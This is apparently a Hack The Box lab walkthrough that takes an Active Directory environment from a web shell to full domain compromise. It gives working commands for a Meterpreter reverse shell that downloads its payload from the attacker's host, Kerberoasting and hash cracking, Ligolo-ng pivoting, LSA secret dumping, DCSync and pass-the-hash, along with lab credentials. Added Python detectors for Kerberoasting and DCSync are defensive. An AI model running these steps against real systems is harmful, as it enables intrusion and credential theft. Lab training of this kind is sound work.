
HTB - AD Enumeration & Attacks - Skills Assessment Part I

Scenario Overview

During an external penetration test, a team member exploited a file upload vulnerability on a public-facing web server and deployed a password-protected web shell in the /uploads directory.

The lab provides the following credentials for access: admin:My_W3bsH3ll_P@ssw0rd!

Starting from this foothold, the objective is to enumerate the Active Directory environment, identify flaws and misconfigurations, move laterally, and ultimately achieve domain compromise.

Attack Chain

The following attack chain summarizes the steps taken from initial access to domain compromise.

Web Shell Access → SYSTEM on WEB-WIN01 → Kerberoasting (svc_sql) → Cracked Credentials → Pivoting → Admin Access on MS01 → LSA Secrets Dump → New Credentials (tpetty) → DCSync → Domain Compromise

Lab Walkthrough

1. Submit the contents of the flag.txt file on the administrator Desktop of the web server

I accessed the web shell at http://<IP>/uploads/antak.aspx and authenticated using the provided credentials admin:My_W3bsH3ll_P@ssw0rd!.

After logging in, I gathered basic system information by running the following command:
hostname ; whoami ; Get-NetIPAddress -AddressFamily IPv4 | Where-Object { $_.PrefixOrigin -ne 'WellKnown' -and $_.InterfaceAlias -notlike '*Loopback*' } | Select-Object IPAddress

The output showed that the server was WEB-WIN01, and the shell was running as NT AUTHORITY\SYSTEM. It also revealed two network interfaces: 172.16.6.100 and 10.129.133.21.

Next, I retrieved the flag from the Administrator’s desktop using
cat C:\Users\Administrator\Desktop\flag.txt, which returned JusT_g3tt1ng_st@rt3d!.

2. Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

Obtaining a Reverse Shell

To gain a more stable shell, I used the Metasploit web_delivery module to generate a Meterpreter reverse shell.
First, I started Metasploit and configured the module:

sudo msfconsole -q
use exploit/multi/script/web_delivery
set payload payload/windows/meterpreter_reverse_tcp
set target PSH\ (Binary)
set lhost tun0
set srvhost tun0
set PSH-ENCODEDCOMMAND false
run

The module generated a PowerShell command that downloads and executes a payload from my machine. I executed this command through the web shell, which established a Meterpreter session on the target system.

Transferring PowerView

I transferred PowerView to the target machine for enumeration. First, I started a simple Python web server on my machine using python3 -m http.server 80. From the Meterpreter shell, I used PowerShell to download PowerView.ps1 from my local machine.

powershell -ep bypass
iwr -Uri http://<localIP>/PowerView.ps1 -OutFile PowerView.ps1

Enumerating Service Accounts

After importing PowerView, I searched for accounts with Service Principal Names (SPNs), which can be targeted for Kerberoasting.

. .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname

This returned several service accounts, including svc_sql, which is the account we are interested in.

3. Crack the account's password. Submit the cleartext value.

Next, I retrieved the TGS ticket for the svc_sql account in Hashcat format using the following command:

Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat

I then cracked the Kerberos hash using Hashcat, which revealed the password lucky7.

hashcat -m 13100 svc_sql_kerb.txt /usr/share/wordlists/rockyou.txt
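As an added defensive counterpart to the Kerberoasting and cracking steps above (this is not code from the original writeup), the following Python script shows how a SOC might spot the same activity in Windows Security Event ID 4769 (Kerberos service ticket request) logs. It applies two rules: flag any successful RC4-encrypted (TicketEncryptionType 0x17/0x18) service ticket for a non-machine service account, and flag any requester that obtains tickets for several distinct service accounts inside a short window. The event records, the svc_demo_* service accounts, the jdoe_demo user, the window and the threshold are all constructed for the example.

```python
"""Detect Kerberoasting-style service-ticket requests in Windows Security
Event ID 4769 records. Added example with constructed data; not code from the
original writeup."""
from collections import defaultdict
from datetime import datetime, timedelta

# Encryption types a roaster prefers: RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18),
# because they are far cheaper to crack offline than AES (0x11/0x12).
RC4_ETYPES = {"0x17", "0x18"}

# Constructed 4769 records (field names follow the event's XML data items).
# jdoe_demo, svc_demo_a and svc_demo_b are made-up names for the sample.
SAMPLE_4769 = [
    # Normal AES ticket for svc_sql from a workstation user: no alert.
    {"time": "2024-01-01T08:55:00", "TargetUserName": "jdoe_demo@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.30", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    # Burst of RC4 tickets from the compromised web server's machine account.
    {"time": "2024-01-01T09:00:00", "TargetUserName": "WEB-WIN01$@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.100", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-01-01T09:00:01", "TargetUserName": "WEB-WIN01$@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.100", "ServiceName": "svc_demo_a",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"time": "2024-01-01T09:00:02", "TargetUserName": "WEB-WIN01$@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.100", "ServiceName": "svc_demo_b",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Ticket for a machine account: long random key, excluded from both rules.
    {"time": "2024-01-01T09:00:03", "TargetUserName": "WEB-WIN01$@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.100", "ServiceName": "MS01$",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Failed request (KDC_ERR_SVC_UNAVAILABLE-style status): no ticket was issued.
    {"time": "2024-01-01T09:30:00", "TargetUserName": "jdoe_demo@INLANEFREIGHT.LOCAL",
     "IpAddress": "172.16.6.30", "ServiceName": "svc_demo_a",
     "TicketEncryptionType": "0x17", "Status": "0x1f"},
]


def is_roastable_service(service_name):
    """Machine accounts (trailing $) and krbtgt are not what a roaster is after,
    so they are excluded from both rules to keep the noise down."""
    n = service_name.lower()
    return not n.endswith("$") and n != "krbtgt"


def find_rc4_requests(events):
    """Rule 1: a successful RC4 service ticket for a user-type service account."""
    return [e for e in events
            if e["Status"] == "0x0"
            and e["TicketEncryptionType"].lower() in RC4_ETYPES
            and is_roastable_service(e["ServiceName"])]


def find_spn_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Rule 2: one requester obtaining tickets for `threshold` or more distinct
    service accounts inside `window`. This also catches roasting that requests
    AES tickets, which rule 1 would miss."""
    by_requester = defaultdict(list)
    for e in events:
        if e["Status"] == "0x0" and is_roastable_service(e["ServiceName"]):
            by_requester[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["time"]), e["ServiceName"]))
    alerts = []
    for requester, reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                alerts.append({"requester": requester, "start": start.isoformat(),
                               "services": sorted(in_window)})
                break  # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for e in find_rc4_requests(SAMPLE_4769):
        print("RC4 service ticket:", e["TargetUserName"], "->", e["ServiceName"])
    for a in find_spn_bursts(SAMPLE_4769):
        print("SPN request burst:", a)
```

On the sample data rule 1 fires on the three tickets for svc_sql, svc_demo_a and svc_demo_b, and rule 2 raises one alert for the WEB-WIN01$ requester. The window and threshold are tuning knobs: monitoring agents and service discovery tools can legitimately request several tickets, so baseline them per environment. The lasting fix for the weakness this writeup exploits is on the account side: service accounts with SPNs need long random passwords (or a group managed service account), and RC4 should be disabled for them so that only AES tickets are issued.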

4. Submit the contents of the flag.txt file on the Administrator desktop on MS01

I pinged MS01 to obtain its IP address.

Pivoting to the Internal Network

The host MS01 (172.16.6.50) was located on the internal network. To access it, I pivoted through the compromised web server using Ligolo-ng.

First, on my local machine I created a TUN interface, brought it up, and started the Ligolo proxy:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:9001

Next, on the compromised web server, I executed the Ligolo agent to connect back to my proxy:

agent.exe -connect <localIP>:9001 -ignore-cert

On my local machine, I selected the active Ligolo session and checked the network interfaces of the compromised host using the ifconfig command. The output showed that the web server had two interfaces, including 172.16.6.100, confirming access to the internal network.

Next, on my local machine I added a route to the internal network through the Ligolo interface:

sudo ip route add 172.16.6.0/24 dev ligolo

Finally, from the Ligolo proxy session, I started the tunnel using the start command.

After establishing the pivot, I scanned the MS01 host to identify exposed services:

sudo nmap 172.16.6.50 -p445,3389 -sV

Since RDP was open on MS01, I tested the previously cracked svc_sql credentials using the nxc command:

nxc rdp 172.16.6.50 -u svc_sql -p lucky7

The output showed “Pwn3d!”, indicating administrative access on the host.

Since the credentials were valid, I connected to MS01 via RDP using the following command:

xfreerdp3 /dynamic-resolution +clipboard /cert:ignore /v:172.16.6.50 /u:svc_sql /p:lucky7

After logging in, I retrieved the flag: spn$_r0ast1ng_on_@n_0p3n_f1re.

5. Find cleartext credentials for another domain user. Submit the username as your answer.

Since I had administrative access on MS01, I used nxc to dump LSA secrets from the host:

sudo nxc smb 172.16.6.50 -u svc_sql -p lucky7 --lsa

This revealed another set of credentials: tpetty:Sup3rS3cur3D0m@inU2eR.

6. Submit this user's cleartext password.

Sup3rS3cur3D0m@inU2eR

7. What attack can this user perform?

Next, I collected Active Directory data using BloodHound:

sudo bloodhound-python -u 'svc_sql' -p 'lucky7' -ns 172.16.6.3 -d INLANEFREIGHT.LOCAL -c all

After analyzing the data in BloodHound, I discovered that the user tpetty had the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions on the INLANEFREIGHT.LOCAL domain.

These permissions allow a user to perform a DCSync attack, which can be used to replicate password hashes from the Domain Controller.
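As an added example (not code from the original writeup), here is how use of the replication rights just described can be detected on the domain controller rather than only discovered in BloodHound. With Directory Service Access auditing enabled and a SACL on the domain object, a replication request logs Security Event ID 4662 with AccessMask 0x100 (Control Access) and the replication control-access-right GUIDs in the Properties field. The script matches those GUIDs and alerts on any subject that is not on an explicit allow-list of domain controller accounts. The sample records, the allow-list contents and the jdoe_demo entry are constructed; the GUIDs are the real control-access-right identifiers.

```python
"""Detect DCSync-style replication requests in Windows Security Event ID 4662
records. Added example with constructed data; not code from the original writeup."""
import re

# Control-access-right GUIDs that grant directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: the domain controllers' own machine accounts.
# Constructed allow-list. Keep it explicit rather than "anything ending in $":
# a member server's account (MS01$ below) is also a machine account.
KNOWN_DC_ACCOUNTS = {"DC01$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}")

# Constructed 4662 records (field names follow the event's XML data items).
SAMPLE_4662 = [
    # Routine DC-to-DC replication by a domain controller account: allowed.
    {"time": "2024-01-01T10:00:00", "SubjectUserName": "DC01$",
     "SubjectDomainName": "INLANEFREIGHT", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling replication data: this is the DCSync signature.
    {"time": "2024-01-01T10:05:00", "SubjectUserName": "tpetty",
     "SubjectDomainName": "INLANEFREIGHT", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131F6AA-9C07-11D1-F79F-00C04FC2DCD2} "
                   "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    # Some other control-access right (constructed GUID): not replication.
    {"time": "2024-01-01T10:06:00", "SubjectUserName": "jdoe_demo",
     "SubjectDomainName": "INLANEFREIGHT", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "AccessMask": "0x100",
     "Properties": "Control Access {deadbeef-0000-4000-8000-000000000001}"},
    # A member server's machine account replicating: not a DC, so it alerts.
    {"time": "2024-01-01T10:07:00", "SubjectUserName": "MS01$",
     "SubjectDomainName": "INLANEFREIGHT", "ObjectName": "DC=INLANEFREIGHT,DC=LOCAL",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def parse_property_guids(properties):
    """Return the lower-cased set of GUIDs embedded in a 4662 Properties field."""
    return {g.lower() for g in GUID_RE.findall(properties)}


def detect_dcsync(events, allowed=KNOWN_DC_ACCOUNTS):
    """Alert on 4662 events where a subject outside `allowed` exercised a
    replication control-access right on a directory object."""
    alerts = []
    for ev in events:
        if ev["AccessMask"].lower() != "0x100":  # only Control Access operations
            continue
        hits = parse_property_guids(ev["Properties"]) & set(REPLICATION_RIGHTS)
        if not hits or ev["SubjectUserName"] in allowed:
            continue
        alerts.append({
            "time": ev["time"],
            "subject": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
            "object": ev["ObjectName"],
            "rights": sorted(REPLICATION_RIGHTS[g] for g in hits),
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_4662):
        print("Replication by non-DC principal:", a)
```

On the sample data the detector returns two alerts, for INLANEFREIGHT\tpetty and INLANEFREIGHT\MS01$, and stays quiet for DC01$ and for the unrelated control-access right. The same GUID table is useful proactively: any ACE on the domain object that grants these rights to a principal other than the domain controllers and the built-in administrative groups is the misconfiguration BloodHound reported here, and removing it takes away the DCSync path entirely.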

8. Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

I used the following command to perform a DCSync attack and dump password hashes from the Domain Controller:

impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3

With the Administrator NTLM hash from the dump, I used the following command to obtain a shell on the Domain Controller:

impacket-psexec administrator@172.16.6.3 -hashes :27dedb1dab4d8545c6e1c66fba077da0

After gaining access, I collected the flag: r3plicat1on_m@st3r!.